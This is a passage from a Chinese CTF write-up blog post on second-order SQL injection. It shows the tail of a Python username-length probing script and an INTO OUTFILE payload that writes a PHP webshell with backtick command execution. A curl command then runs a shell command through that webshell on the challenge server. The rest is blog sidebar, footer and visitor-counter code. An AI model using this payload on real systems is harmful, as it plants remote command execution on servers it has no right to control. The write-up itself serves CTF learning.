i;</span><br><span class="line">        reg(username)</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> log(username):</span><br><span class="line">            print(<span class="string">'Max username length is %d'</span> % (i<span class="number">-1</span>) )</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure></p>
<p>结果为60<br><img src="len.png" alt=""><br>重新构造payload为<code>&lt;?=`$_GET[3]`;?&gt;&#39;into outfile&#39;/var/www/html/favicon/3.php&#39;#</code><br><strong>&lt;?= 等同于 &lt;?php echo    反引号是php的执行运算符等同与shell_exec()函数，直接执行shell命令，单引号和关键字之间不加空格来缩短长度，所以以后在渗透的时候要尽量先把payload处理到最短，避免出现一些不必要的问题</strong><br>接着注册两个用户，然后直接登陆第二个，接着连接shell</p>
<blockquote>
<p>$ curl <a href="http://39.107.124.151:1002/favicon/3.php?3=ls%20/" target="_blank" rel="noopener">http://39.107.124.151:1002/favicon/3.php?3=ls%20/</a></p>
</blockquote>
<p><img src="flag.png" alt=""></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"># Web</a>
          
            <a href="/tags/SQLi/" rel="tag"># SQLi</a>
          
            <a href="/tags/二次注入/" rel="tag"># 二次注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/04/30/StarCTF2018-PPC-Part/" rel="next" title="StarCTF-PPC-Part">
                <i class="fa fa-chevron-left"></i> StarCTF-PPC-Part
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/28/SECCON2018-Web-GhostKindom-WP/" rel="prev" title="SECCON2018-Web-GhostKindom-WP">
                SECCON2018-Web-GhostKindom-WP <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">donky16</p>
              <p class="site-description motion-element" itemprop="description">质性自然，非矫历所得</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#题目描述"><span class="nav-number">1.</span> <span class="nav-text">题目描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题思想"><span class="nav-number">2.</span> <span class="nav-text">解题思想</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#预期解法"><span class="nav-number">2.1.</span> <span class="nav-text">预期解法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#非预期解法-（二次注入）"><span class="nav-number">2.2.</span> <span class="nav-text">非预期解法 （二次注入）</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">donky16</span>

  
</div>

  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("1ED3VT5hiQ1gyfGzY4MvEuXY-gzGzoHsz", "fC60jPizXAYi9geAXLWdqoWr");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
